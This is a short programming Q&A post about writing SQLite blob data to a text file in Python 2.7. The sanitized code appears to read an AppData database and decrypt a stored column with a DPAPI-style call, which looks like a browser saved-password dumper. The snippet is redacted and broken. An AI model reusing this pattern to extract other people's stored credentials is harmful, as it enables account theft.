# Python 2.7.11 SQLite blob to text?

Tags: python

I am using python 2.7.11 and slite3 module

When I try to use write to store my output to a txt file from sql, it shows a blob  not text?

How do I convert the blob to ascii? This only happens when using f.write but if I run in idle, I can see the ascii value. How do I convert the blob to readable text to my file output?

```
conn1 = sqlite3.connect(getenv("APPDATA") + "\..\Local\SANITIZED")
cursor3 = conn3.cursor()
cursor1 = conn1.cursor()
cursor = conn.cursor()
cursor.execute('SELECT * FROM SANITIZED')
for result in cursor.fetchall():
    SANITIZED(result[2], None, None, None, 0)[1]
    if SANITIZED:   
        print('SANITIZED: ' + SANITIZED)

        f.write(str(result))
```

Comment: output looks like <read-write buffer ptr 0x000000000315A800, size 154 at 0x000000000315A7C8>

Comment: I figured it out XD Thanks

Comment: so how did you figure it out?  Why not answer your own question so that others have your insight?

Comment: I was using incorrect variable